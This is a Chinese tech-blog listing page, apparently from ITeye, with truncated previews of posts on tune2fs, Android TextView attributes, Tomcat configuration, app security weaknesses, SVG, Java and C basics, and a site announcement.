    一.简介: tune2fs是调整和查看ext2/ext3文件系统的文件系统参数,Windows下面如果出现意外断电死机情况,下次开机一般都会出现系统自检。Linux系统下面也有文件系统自检,而且是可以通过tune2fs命令,自行定义自检周期及方式。 二.用法: Usage: tune2fs [-c max_mounts_count] [-e errors_behavior] [-g grou
  • 做有中国特色的程序员 dcj3sjt126com 程序员
      从出版业说起 网络作品排到靠前的,都不会太难看,一般人不爱看某部作品也是因为不喜欢这个类型,而此人也不会全不喜欢这些网络作品。究其原因,是因为网络作品都是让人先白看的,看的好了才出了头。而纸质作品就不一定了,排行榜靠前的,有好作品,也有垃圾。 许多大牛都是写了博客,后来出了书。这些书也都不次,可能有人让为不好,是因为技术书不像小说,小说在读故事,技术书是在学知识或温习知识,有
  • Android:TextView属性大全 dcj3sjt126com textview
    android:autoLink    设置是否当文本为URL链接/email/电话号码/map时,文本显示为可点击的链接。可选值(none/web/email/phone/map/all)  android:autoText    如果设置,将自动执行输入值的拼写纠正。此处无效果,在显示输入法并输
  • tomcat虚拟目录安装及其配置 eksliang tomcat配置说明tomca部署web应用tomcat虚拟目录安装
    转载请出自出处:http://eksliang.iteye.com/blog/2097184 1.-------------------------------------------tomcat  目录结构 config:存放tomcat的配置文件 temp  :存放tomcat跑起来后存放临时文件用的 work   : 当第一次访问应用中的jsp
  • 浅谈:APP有哪些常被黑客利用的安全漏洞 gg163 APP
    首先,说到APP的安全漏洞,身为程序猿的大家应该不陌生;如果抛开安卓自身开源的问题的话,其主要产生的原因就是开发过程中疏忽或者代码不严谨引起的。但这些责任也不能怪在程序猿头上,有时会因为BOSS时间催得紧等很多可观原因。由国内移动应用安全检测团队爱内测(ineice.com)的CTO给我们浅谈关于Android 系统的开源设计以及生态环境。 1. 应用反编译漏洞:APK 包非常容易被反编译成可读
  • C#根据网址生成静态页面 hvt Web.netC#asp.nethovertree
    HoverTree开源项目中HoverTreeWeb.HVTPanel的Index.aspx文件是后台管理的首页。包含生成留言板首页,以及显示用户名,退出等功能。根据网址生成页面的方法:   bool CreateHtmlFile(string url, string path) { //http://keleyi.com/a/bjae/3d10wfax.htm stri
  • SVG 教程 (一) 天梯梦 svg
    SVG 简介 SVG 是使用 XML 来描述二维图形和绘图程序的语言。 学习之前应具备的基础知识: 继续学习之前,你应该对以下内容有基本的了解: HTML XML 基础 如果希望首先学习这些内容,请在本站的首页选择相应的教程。 什么是SVG? SVG 指可伸缩矢量图形 (Scalable Vector Graphics) SVG 用来定义用于网络的基于矢量
  • 一个简单的java栈 luyulong java数据结构
    public class MyStack { private long[] arr; private int top; public MyStack() { arr = new long[10]; top = -1; } public MyStack(int maxsize) { arr = new long[maxsize]; top
  • 基础数据结构和算法八:Binary search sunwinner AlgorithmBinary search
    Binary search needs an ordered array so that it can use array indexing to dramatically reduce the number of compares required for each search, using the classic and venerable binary search algori
  • 12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 刘星宇 c面试
    12个C语言面试题,涉及指针、进程、运算、结构体、函数、内存,看看你能做出几个! 1.gets()函数 问:请找出下面代码里的问题: #include<stdio.h> int main(void) {     char buff[10];     memset(buff,0,sizeof(buff));
  • ITeye 7月技术图书有奖试读获奖名单公布 ITeye管理员 活动ITeye试读
    ITeye携手人民邮电出版社图灵教育共同举办的7月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 7月试读活动回顾: http://webmaster.iteye.com/blog/2092746 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《Java性能优化权威指南》
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他